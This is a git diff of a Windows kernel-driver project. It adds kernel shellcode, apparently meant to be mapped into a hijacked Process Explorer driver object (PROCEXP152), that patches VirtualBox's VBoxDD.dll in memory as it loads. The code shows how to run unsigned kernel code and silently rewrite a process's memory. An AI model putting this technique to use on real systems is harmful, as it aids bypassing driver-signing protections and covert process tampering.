-* DATE: 20 Apr 2017
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-
-#pragma once
-
-typedef struct _VBOX_PATCH {
- KMUTEX Lock; // Synchronization mutex
- PKEY_VALUE_PARTIAL_INFORMATION Chains; // bufer
- ULONG_PTR ChainsLength; // buffer length in bytes
-} VBOX_PATCH, *PVBOX_PATCH;
-
-typedef struct _BINARY_PATCH_BLOCK {
- ULONG VirtualOffset;
- UCHAR DataLength;
- UCHAR Data[1];
-} BINARY_PATCH_BLOCK, *PBINARY_PATCH_BLOCK;
-
-NTKERNELAPI
-NTSTATUS
-IoCreateDriver(
- IN PUNICODE_STRING DriverName, OPTIONAL
- IN PDRIVER_INITIALIZE InitializationFunction
-);
-
-_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
-DRIVER_DISPATCH DevioctlDispatch;
-_Dispatch_type_(IRP_MJ_CREATE)
-_Dispatch_type_(IRP_MJ_CLOSE)
-DRIVER_DISPATCH CreateCloseDispatch;
-
-_Dispatch_type_(IRP_MJ_CREATE)
-_Dispatch_type_(IRP_MJ_CREATE_NAMED_PIPE)
-_Dispatch_type_(IRP_MJ_CLOSE)
-_Dispatch_type_(IRP_MJ_READ)
-_Dispatch_type_(IRP_MJ_WRITE)
-_Dispatch_type_(IRP_MJ_QUERY_INFORMATION)
-_Dispatch_type_(IRP_MJ_SET_INFORMATION)
-_Dispatch_type_(IRP_MJ_QUERY_EA)
-_Dispatch_type_(IRP_MJ_SET_EA)
-_Dispatch_type_(IRP_MJ_FLUSH_BUFFERS)
-_Dispatch_type_(IRP_MJ_QUERY_VOLUME_INFORMATION)
-_Dispatch_type_(IRP_MJ_SET_VOLUME_INFORMATION)
-_Dispatch_type_(IRP_MJ_DIRECTORY_CONTROL)
-_Dispatch_type_(IRP_MJ_FILE_SYSTEM_CONTROL)
-_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
-_Dispatch_type_(IRP_MJ_INTERNAL_DEVICE_CONTROL)
-_Dispatch_type_(IRP_MJ_SHUTDOWN)
-_Dispatch_type_(IRP_MJ_LOCK_CONTROL)
-_Dispatch_type_(IRP_MJ_CLEANUP)
-_Dispatch_type_(IRP_MJ_CREATE_MAILSLOT)
-_Dispatch_type_(IRP_MJ_QUERY_SECURITY)
-_Dispatch_type_(IRP_MJ_SET_SECURITY)
-_Dispatch_type_(IRP_MJ_POWER)
-_Dispatch_type_(IRP_MJ_SYSTEM_CONTROL)
-_Dispatch_type_(IRP_MJ_DEVICE_CHANGE)
-_Dispatch_type_(IRP_MJ_QUERY_QUOTA)
-_Dispatch_type_(IRP_MJ_SET_QUOTA)
-_Dispatch_type_(IRP_MJ_PNP)
-DRIVER_DISPATCH UnsupportedDispatch;
-
-DRIVER_INITIALIZE DriverEntry;
-DRIVER_INITIALIZE DriverInitialize;
-DRIVER_UNLOAD DriverUnload;
-NTSTATUS TsmiHandleMemWrite(_In_ PVOID SrcAddress, _In_ PVOID DestAddress, _In_ ULONG Size);
-NTSTATUS TsmiLoadParameters(VOID);
-NTSTATUS TsmiPatchImage(_In_ VBOX_PATCH *PatchInfo, _In_ PIMAGE_INFO ImageInfo);
-NTSTATUS TsmiReadPatchChains(_In_ HANDLE sKey, _In_ PUNICODE_STRING ParamName, _In_ VBOX_PATCH *PatchInfo);
-VOID TsmiPsImageHandler(_In_ PUNICODE_STRING FullImageName, _In_ HANDLE ProcessId, _In_ PIMAGE_INFO ImageInfo);
-VOID TsmiListPatchChains(_In_ KEY_VALUE_PARTIAL_INFORMATION *PatchChains);
-VOID TsmiCopyPatchChainsData(_In_ VBOX_PATCH *Src, _In_ VBOX_PATCH *Dst);
-
-#pragma alloc_text(INIT, DriverEntry)
-#pragma alloc_text(INIT, DriverInitialize)
-#pragma alloc_text(PAGE, TsmiLoadParameters)
-#pragma alloc_text(PAGE, TsmiHandleMemWrite)
-#pragma alloc_text(PAGE, TsmiPsImageHandler)
-#pragma alloc_text(PAGE, TsmiPatchImage)
-#pragma alloc_text(PAGE, TsmiCopyPatchChainsData)
-#pragma alloc_text(PAGE, TsmiListPatchChains)
-#pragma alloc_text(PAGE, TsmiReadPatchChains)
-#pragma alloc_text(PAGE, DevioctlDispatch)
-#pragma alloc_text(PAGE, CreateCloseDispatch)
-#pragma alloc_text(PAGE, UnsupportedDispatch)
-#pragma alloc_text(PAGE, DriverUnload)
-
-#define TSUGUMI_IOCTL_REFRESH_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0700, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
-#define TSUGUMI_IOCTL_MONITOR_STOP CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
-
-#define TSUGUMI_TAG 'imsT'
-#define BLOCK_DATA_OFFSET (ULONG_PTR)(&((PBINARY_PATCH_BLOCK)0)->Data)
-#define TSUGUMI_DRV_OBJECT L"\\Driver\\TsmiDrv"
-#define TSUGUMI_DEV_OBJECT L"\\Device\\Tsugumi"
-#define TSUGUMI_SYM_LINK L"\\DosDevices\\Tsugumi"
-#define TSUGUMI_PARAMS L"\\REGISTRY\\MACHINE\\SOFTWARE\\Tsugumi\\Parameters"
-
-#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
diff --git a/Source/Tsugumi/resource.h b/Source/Tsugumi/resource.h
deleted file mode 100644
index 7ca31da..0000000
--- a/Source/Tsugumi/resource.h
+++ /dev/null
@@ -1,14 +0,0 @@
-//{{NO_DEPENDENCIES}}
-// Microsoft Visual C++ generated include file.
-// Used by Resource.rc
-
-// Next default values for new objects
-//
-#ifdef APSTUDIO_INVOKED
-#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 101
-#define _APS_NEXT_COMMAND_VALUE 40001
-#define _APS_NEXT_CONTROL_VALUE 1001
-#define _APS_NEXT_SYMED_VALUE 101
-#endif
-#endif
diff --git a/Source/Tsugumi_shell/Tsugumi_shell.sln b/Source/Tsugumi_shell/Tsugumi_shell.sln
new file mode 100644
index 0000000..0a8bdf1
--- /dev/null
+++ b/Source/Tsugumi_shell/Tsugumi_shell.sln
@@ -0,0 +1,51 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29709.97
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Tsugumi_shell", "Tsugumi_shell\Tsugumi_shell.vcxproj", "{C5E469AF-A1ED-4B35-98EF-128D984D7A73}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|ARM = Debug|ARM
+ Debug|ARM64 = Debug|ARM64
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|ARM = Release|ARM
+ Release|ARM64 = Release|ARM64
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM.ActiveCfg = Debug|ARM
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM.Build.0 = Debug|ARM
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM.Deploy.0 = Debug|ARM
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM64.ActiveCfg = Debug|ARM64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM64.Build.0 = Debug|ARM64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM64.Deploy.0 = Debug|ARM64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x64.ActiveCfg = Debug|x64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x64.Build.0 = Debug|x64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x64.Deploy.0 = Debug|x64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x86.ActiveCfg = Debug|Win32
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x86.Build.0 = Debug|Win32
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x86.Deploy.0 = Debug|Win32
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM.ActiveCfg = Release|ARM
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM.Build.0 = Release|ARM
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM.Deploy.0 = Release|ARM
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM64.ActiveCfg = Release|ARM64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM64.Build.0 = Release|ARM64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM64.Deploy.0 = Release|ARM64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x64.ActiveCfg = Release|x64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x64.Build.0 = Release|x64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x64.Deploy.0 = Release|x64
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x86.ActiveCfg = Release|Win32
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x86.Build.0 = Release|Win32
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x86.Deploy.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {41F0A6C0-9C5C-4208-A6E0-AAC2BB0284A9}
+ EndGlobalSection
+EndGlobal
diff --git a/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi.h b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi.h
new file mode 100644
index 0000000..71312bf
--- /dev/null
+++ b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi.h
@@ -0,0 +1,171 @@
+/*
+
+Tsugumi shellcode project
+
+File : Tsugumi.h
+Modified : Wed Jan 29 2020, 22:30
+
+*/
+
+#pragma once
+
+#ifndef _TSUGUMI_H_
+#define _TSUGUMI_H_
+
+#include
+
+typedef struct _BINARY_PATCH_BLOCK {
+ ULONG VirtualOffset;
+ UCHAR DataLength;
+ UCHAR Data[1];
+} BINARY_PATCH_BLOCK, * PBINARY_PATCH_BLOCK;
+
+#define BLOCK_DATA_OFFSET (ULONG_PTR)(&((PBINARY_PATCH_BLOCK)0)->Data)
+
+typedef _Check_return_ int(__cdecl* PFN_wcsnicmp)(_In_reads_or_z_(_MaxCount) const wchar_t* _Str1, _In_reads_or_z_(_MaxCount) const wchar_t* _Str2, _In_ size_t _MaxCount);
+
+typedef _IRQL_requires_max_(DISPATCH_LEVEL) PMDL (*PFN_IoAllocateMdl)(
+ _In_opt_ __drv_aliasesMem PVOID VirtualAddress,
+ _In_ ULONG Length,
+ _In_ BOOLEAN SecondaryBuffer,
+ _In_ BOOLEAN ChargeQuota,
+ _Inout_opt_ PIRP Irp
+);
+
+typedef _IRQL_requires_max_(DISPATCH_LEVEL) VOID (*PFN_IoFreeMdl)(
+ PMDL Mdl
+);
+
+typedef HANDLE (*PFN_PsGetCurrentProcessId)(
+ VOID
+);
+
+typedef _Must_inspect_result_ _IRQL_requires_max_(DISPATCH_LEVEL) NTSTATUS (*PFN_MmProtectMdlSystemAddress)(
+ _In_ PMDL MemoryDescriptorList,
+ _In_ ULONG NewProtect
+);
+
+typedef _IRQL_requires_max_(DISPATCH_LEVEL) VOID (*PFN_MmUnmapLockedPages)(
+ _In_ PVOID BaseAddress,
+ _Inout_ PMDL MemoryDescriptorList
+);
+
+typedef _IRQL_requires_max_(PASSIVE_LEVEL) NTSTATUS (*PFN_PsSetLoadImageNotifyRoutine)(
+ _In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine
+);
+
+typedef _IRQL_requires_max_(DISPATCH_LEVEL) VOID (*PFN_MmUnlockPages)(
+ _Inout_ PMDL MemoryDescriptorList
+);
+
+typedef _IRQL_requires_max_(DISPATCH_LEVEL)
+_At_(MemoryDescriptorList->StartVa + MemoryDescriptorList->ByteOffset,
+ _Field_size_bytes_opt_(MemoryDescriptorList->ByteCount)) // Esp:823 Esp:829
+ VOID (*PFN_MmProbeAndLockPages)(
+ _Inout_ PMDL MemoryDescriptorList,
+ _In_ KPROCESSOR_MODE AccessMode,
+ _In_ LOCK_OPERATION Operation
+ );
+
+typedef _Post_writable_byte_size_(MemoryDescriptorList->ByteCount)
+_When_(AccessMode == KernelMode, _IRQL_requires_max_(DISPATCH_LEVEL))
+_When_(AccessMode == UserMode, _Maybe_raises_SEH_exception_ _IRQL_requires_max_(APC_LEVEL) _Post_notnull_)
+_At_(MemoryDescriptorList->MappedSystemVa,
+ _Post_writable_byte_size_(MemoryDescriptorList->ByteCount)) // Esp:829
+ _Must_inspect_result_
+ _Success_(return != NULL)
+ PVOID (*PFN_MmMapLockedPagesSpecifyCache)(
+ _Inout_ PMDL MemoryDescriptorList,
+ _In_ __drv_strictType(KPROCESSOR_MODE / enum _MODE, __drv_typeConst)
+ KPROCESSOR_MODE AccessMode,
+ _In_ __drv_strictTypeMatch(__drv_typeCond) MEMORY_CACHING_TYPE CacheType,
+ _In_opt_ PVOID RequestedAddress,
+ _In_ ULONG BugCheckOnFailure,
+ _In_ ULONG Priority // MM_PAGE_PRIORITY logically OR'd with MdlMapping*
+ );
+
+typedef _IRQL_requires_max_(PASSIVE_LEVEL)
+NTSTATUS (*PFN_PsSetLoadImageNotifyRoutine)(
+ _In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine
+);
+
+typedef _IRQL_requires_max_(PASSIVE_LEVEL)
+NTSTATUS (*PFN_PsRemoveLoadImageNotifyRoutine)(
+ _In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine
+);
+
+typedef _IRQL_requires_max_(DISPATCH_LEVEL)
+VOID (FASTCALL *PFN_IofCompleteRequest)(
+ _In_ PIRP Irp,
+ _In_ CCHAR PriorityBoost
+);
+
+typedef _IRQL_requires_min_(PASSIVE_LEVEL)
+_IRQL_requires_max_(APC_LEVEL)
+NTSTATUS (*PFN_KeDelayExecutionThread)(
+ _In_ KPROCESSOR_MODE WaitMode,
+ _In_ BOOLEAN Alertable,
+ _In_ PLARGE_INTEGER Interval
+);
+
+typedef _IRQL_requires_max_(DISPATCH_LEVEL)
+_At_(DestinationString->Buffer, _Post_equal_to_(SourceString))
+_At_(DestinationString->Length, _Post_equal_to_(_String_length_(SourceString) * sizeof(WCHAR)))
+_At_(DestinationString->MaximumLength, _Post_equal_to_((_String_length_(SourceString) + 1) * sizeof(WCHAR)))
+VOID (NTAPI *PFN_RtlInitUnicodeString)(
+ _Out_ PUNICODE_STRING DestinationString,
+ _In_opt_z_ __drv_aliasesMem PCWSTR SourceString
+);
+
+typedef _IRQL_requires_max_(PASSIVE_LEVEL)
+NTSTATUS (*PFN_IoDeleteSymbolicLink)(
+ _In_ PUNICODE_STRING SymbolicLinkName
+);
+
+typedef _IRQL_requires_max_(APC_LEVEL)
+_Kernel_clear_do_init_(__yes)
+VOID (*PFN_IoDeleteDevice)(
+ _In_ __drv_freesMem(Mem) PDEVICE_OBJECT DeviceObject
+);
+
+VOID PsImageHandler(
+ _In_ PUNICODE_STRING FullImageName,
+ _In_ HANDLE ProcessId,
+ _In_ PIMAGE_INFO ImageInfo
+);
+
+VOID DriverUnload(
+ _In_ PDRIVER_OBJECT DriverObject
+);
+
+#define MAX_CONFIGURATION_DATA_SIZE 1024
+
+typedef struct _MAPPED_CODE_DATA {
+ // Lock
+ ULONG fInititialized;
+ LONG iNotifyCounter;
+
+ // API pointers
+ PFN_wcsnicmp _wcsnicmp;
+ PFN_IoAllocateMdl IoAllocateMdl;
+ PFN_IofCompleteRequest IofCompleteRequest;
+ PFN_IoFreeMdl IoFreeMdl;
+ PFN_IoDeleteDevice IoDeleteDevice;
+ PFN_IoDeleteSymbolicLink IoDeleteSymbolicLink;
+ PFN_KeDelayExecutionThread KeDelayExecutionThread;
+ PFN_PsGetCurrentProcessId PsGetCurrentProcessId;
+ PFN_PsSetLoadImageNotifyRoutine PsSetLoadImageNotifyRoutine;
+ PFN_PsRemoveLoadImageNotifyRoutine PsRemoveLoadImageNotifyRoutine;
+ PFN_MmProtectMdlSystemAddress MmProtectMdlSystemAddress;
+ PFN_MmUnmapLockedPages MmUnmapLockedPages;
+ PFN_MmUnlockPages MmUnlockPages;
+ PFN_MmProbeAndLockPages MmProbeAndLockPages;
+ PFN_MmMapLockedPagesSpecifyCache MmMapLockedPagesSpecifyCache;
+ PFN_RtlInitUnicodeString RtlInitUnicodeString;
+
+ // data
+ ULONG ConfigurationDataSize;
+ UCHAR ConfigurationData[MAX_CONFIGURATION_DATA_SIZE];
+} MAPPED_CODE_DATA, * PMAPPED_CODE_DATA;
+
+#endif /* _TSUGUMI_H_ */
\ No newline at end of file
diff --git a/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj
new file mode 100644
index 0000000..0b72815
--- /dev/null
+++ b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj
@@ -0,0 +1,214 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+ Debug
+ ARM
+
+
+ Release
+ ARM
+
+
+ Debug
+ ARM64
+
+
+ Release
+ ARM64
+
+
+
+ {C5E469AF-A1ED-4B35-98EF-128D984D7A73}
+ {1bc93793-694f-48fe-9372-81e2b05556fd}
+ v4.5
+ 12.0
+ Debug
+ Win32
+ Tsugumi_shell
+ $(LatestTargetPlatformVersion)
+
+
+
+ Windows10
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ KMDF
+ Universal
+
+
+ Windows10
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ KMDF
+ Universal
+
+
+ Windows10
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ KMDF
+ Universal
+
+
+ Windows10
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ KMDF
+ Universal
+ false
+
+
+ Windows10
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ KMDF
+ Universal
+
+
+ Windows10
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ KMDF
+ Universal
+
+
+ Windows10
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ KMDF
+ Universal
+
+
+ Windows10
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ KMDF
+ Universal
+
+
+
+
+
+
+
+
+
+
+ DbgengKernelDebugger
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ true
+
+
+ DbgengKernelDebugger
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ true
+
+
+ DbgengKernelDebugger
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ true
+
+
+ DbgengKernelDebugger
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ true
+ false
+ AllRules.ruleset
+ false
+
+
+ DbgengKernelDebugger
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ true
+
+
+ DbgengKernelDebugger
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ true
+
+
+ DbgengKernelDebugger
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ true
+ true
+
+
+ DbgengKernelDebugger
+ .\output\$(Platform)\$(Configuration)\
+ .\output\$(Platform)\$(Configuration)\
+ true
+ true
+
+
+
+ None
+ false
+ true
+ MaxSpeed
+ Speed
+ false
+ false
+ false
+ false
+ CompileAsC
+ true
+
+
+ false
+ false
+ true
+ true
+ true
+ true
+ Default
+ DriverMain
+ true
+ true
+ /INTEGRITYCHECK /ORDER:@fnorder.txt %(AdditionalOptions)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/Source/Tsugumi/Tsugumi.vcxproj.filters b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.filters
similarity index 82%
rename from Source/Tsugumi/Tsugumi.vcxproj.filters
rename to Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.filters
index a738ade..50f9bea 100644
--- a/Source/Tsugumi/Tsugumi.vcxproj.filters
+++ b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.filters
@@ -24,16 +24,8 @@
-
+
Header Files
-
- Header Files
-
-
-
-
- Resource Files
-
\ No newline at end of file
diff --git a/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.user b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.user
new file mode 100644
index 0000000..b2a2bcc
--- /dev/null
+++ b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.user
@@ -0,0 +1,6 @@
+
+
+
+ Off
+
+
\ No newline at end of file
diff --git a/Source/Tsugumi_shell/Tsugumi_shell/fnorder.txt b/Source/Tsugumi_shell/Tsugumi_shell/fnorder.txt
new file mode 100644
index 0000000..4bc7ffb
--- /dev/null
+++ b/Source/Tsugumi_shell/Tsugumi_shell/fnorder.txt
@@ -0,0 +1,4 @@
+DriverMain
+DriverUnload
+HandleUserMemWrite
+PsImageHandler
\ No newline at end of file
diff --git a/Source/Tsugumi_shell/Tsugumi_shell/main.c b/Source/Tsugumi_shell/Tsugumi_shell/main.c
new file mode 100644
index 0000000..d32a107
--- /dev/null
+++ b/Source/Tsugumi_shell/Tsugumi_shell/main.c
@@ -0,0 +1,159 @@
+/*
+
+Tsugumi shellcode project
+
+File : main.c
+Modified : Wed Jan 29 2020, 22:30
+
+*/
+
+#include
+#include
+#include "Tsugumi.h"
+
+/*
+ disable C6320 "Exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER.
+ This might mask exceptions that were not intended to be handled."
+*/
+#pragma warning(disable: 6320)
+
+NTSTATUS DriverMain(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
+{
+ volatile const PMAPPED_CODE_DATA ShellEnvBlock =
+ (PMAPPED_CODE_DATA)(ULONG_PTR)0x1337c0de1cedc01a; // Magic pattern to search and replace
+ volatile PVOID fnptr = (PVOID)&DriverUnload; // hack to prevent unreferenced code elimination
+
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(fnptr);
+
+ if (ShellEnvBlock->fInititialized != 1) // We should use a fast mutex here, but we can't properly initialize it in shell code.
+ {
+ ShellEnvBlock->fInititialized = 1;
+ ShellEnvBlock->PsSetLoadImageNotifyRoutine(PsImageHandler); // PsImageHandler referenced by relative addressing. No need to fix.
+ }
+
+ Irp->IoStatus.Status = STATUS_SUCCESS;
+ ShellEnvBlock->IofCompleteRequest(Irp, IO_NO_INCREMENT);
+ return STATUS_SUCCESS;
+}
+
+VOID DriverUnload(
+ _In_ PDRIVER_OBJECT DriverObject
+)
+{
+ volatile const PMAPPED_CODE_DATA ShellEnvBlock =
+ (PMAPPED_CODE_DATA)(ULONG_PTR)0x1337c0de1cedc01a; // Magic pattern to search and replace
+
+ LARGE_INTEGER t;
+ UNICODE_STRING sl;
+ WCHAR sl_name[23] = {
+ L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i',L'c', L'e', L's',
+ L'\\', L'P', L'R', L'O', L'C', L'E', L'X', L'P',L'1', L'5', L'2', L'\0'
+ };
+ // \DosDevices\PROCEXP152
+
+ ShellEnvBlock->PsRemoveLoadImageNotifyRoutine(PsImageHandler);
+ ShellEnvBlock->RtlInitUnicodeString(&sl, sl_name);
+ ShellEnvBlock->IoDeleteSymbolicLink(&sl);
+ ShellEnvBlock->IoDeleteDevice(DriverObject->DeviceObject);
+
+ t.QuadPart = -100000ll; // 0.1 sec
+ while (ShellEnvBlock->iNotifyCounter != 0)
+ ShellEnvBlock->KeDelayExecutionThread(KernelMode, FALSE, &t);
+
+ ShellEnvBlock->KeDelayExecutionThread(KernelMode, FALSE, &t);
+}
+
+NTSTATUS HandleUserMemWrite(
+ _In_ PMAPPED_CODE_DATA ShellEnvBlock,
+ _In_ PVOID SrcAddress,
+ _In_ PVOID DestAddress,
+ _In_ ULONG Size)
+{
+ PMDL mdl;
+ NTSTATUS status = STATUS_SUCCESS;
+
+ mdl = ShellEnvBlock->IoAllocateMdl(DestAddress, Size, FALSE, FALSE, NULL);
+ if (mdl == NULL)
+ return STATUS_INSUFFICIENT_RESOURCES;
+
+ __try {
+ if ((ULONG_PTR)DestAddress >= 0x7FFFFFFFFFFFull)
+ return STATUS_CONFLICTING_ADDRESSES;
+
+ ShellEnvBlock->MmProbeAndLockPages(mdl, KernelMode, IoReadAccess);
+ // DestAddress = ShellEnvBlock->MmGetSystemAddressForMdlSafe(mdl, HighPagePriority | MdlMappingNoExecute);
+
+ // begin MmGetSystemAddressForMdlSafe copy-paste
+ if (mdl->MdlFlags & (MDL_MAPPED_TO_SYSTEM_VA | MDL_SOURCE_IS_NONPAGED_POOL)) {
+ DestAddress = mdl->MappedSystemVa;
+ }
+ else {
+ DestAddress = ShellEnvBlock->MmMapLockedPagesSpecifyCache(mdl, KernelMode, MmCached,
+ NULL, FALSE, HighPagePriority | MdlMappingNoExecute);
+ }
+ // end MmGetSystemAddressForMdlSafe copy-paste
+
+ if (DestAddress != NULL) {
+ status = ShellEnvBlock->MmProtectMdlSystemAddress(mdl, PAGE_READWRITE);
+ __movsb((PUCHAR)DestAddress, (const UCHAR*)SrcAddress, Size); // intrinsic
+ ShellEnvBlock->MmUnmapLockedPages(DestAddress, mdl);
+ ShellEnvBlock->MmUnlockPages(mdl);
+ }
+ else {
+ status = STATUS_ACCESS_VIOLATION;
+ }
+ }
+ __except (EXCEPTION_EXECUTE_HANDLER) {
+ status = STATUS_ACCESS_VIOLATION;
+ }
+
+ ShellEnvBlock->IoFreeMdl(mdl);
+ return status;
+}
+
+VOID PsImageHandler(
+ _In_ PUNICODE_STRING FullImageName,
+ _In_ HANDLE ProcessId,
+ _In_ PIMAGE_INFO ImageInfo
+)
+{
+ volatile const PMAPPED_CODE_DATA ShellEnvBlock =
+ (PMAPPED_CODE_DATA)(ULONG_PTR)0x1337c0de1cedc01a; // Magic pattern to search and replace
+
+ InterlockedIncrement(&ShellEnvBlock->iNotifyCounter);
+
+ PBINARY_PATCH_BLOCK PatchChains;
+ ULONG c, l = 0;
+ WCHAR TargetDllName[11] = {
+ L'V', L'B', L'o', L'x', L'D', L'D', L'.', L'd',L'l', L'l', L'\0'
+ };
+
+ while ((FullImageName != NULL) && (ImageInfo != NULL) && (ShellEnvBlock->PsGetCurrentProcessId() == ProcessId))
+ {
+ if ((FullImageName->Buffer == NULL) || (FullImageName->Length == 0))
+ break;
+
+ for (c = 0; c < (ULONG)FullImageName->Length / 2; ++c)
+ if (FullImageName->Buffer[c] == '\\')
+ l = c + 1;
+
+ if (ShellEnvBlock->_wcsnicmp(&FullImageName->Buffer[l], TargetDllName, wcslen(TargetDllName)) == 0) { // wcslen got inlined
+ l = 0;
+ PatchChains = (PBINARY_PATCH_BLOCK)&ShellEnvBlock->ConfigurationData;
+
+ while (l + BLOCK_DATA_OFFSET < ShellEnvBlock->ConfigurationDataSize) {
+ if (PatchChains->DataLength != 0)
+ // HandleUserMemWrite called by relative addressing. No need to fix.
+ HandleUserMemWrite(ShellEnvBlock, PatchChains->Data,
+ (PVOID)((ULONG_PTR)ImageInfo->ImageBase + PatchChains->VirtualOffset), PatchChains->DataLength);
+ l += BLOCK_DATA_OFFSET + PatchChains->DataLength;
+ PatchChains = (PBINARY_PATCH_BLOCK)((ULONG_PTR)PatchChains + BLOCK_DATA_OFFSET + PatchChains->DataLength);
+ }
+ }
+
+ break;
+ }
+
+ InterlockedDecrement(&ShellEnvBlock->iNotifyCounter);
+}
diff --git a/Source/Zekamashi/loader/Resource.rc b/Source/Zekamashi/loader/Resource.rc
deleted file mode 100644
index 3ff5c7a..0000000
Binary files a/Source/Zekamashi/loader/Resource.rc and /dev/null differ
diff --git a/Source/Zekamashi/loader/cui.c b/Source/Zekamashi/loader/cui.c
deleted file mode 100644
index 9ce5dcd..0000000
--- a/Source/Zekamashi/loader/cui.c
+++ /dev/null
@@ -1,223 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2016 - 2018
-*
-* TITLE: CUI.C
-*
-* VERSION: 1.30
-*
-* DATE: 01 Aug 2018
-*
-* Console output.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-#include "global.h"
-
-HANDLE g_ConOut = NULL, g_ConIn = NULL;
-BOOL g_ConsoleOutput = FALSE;
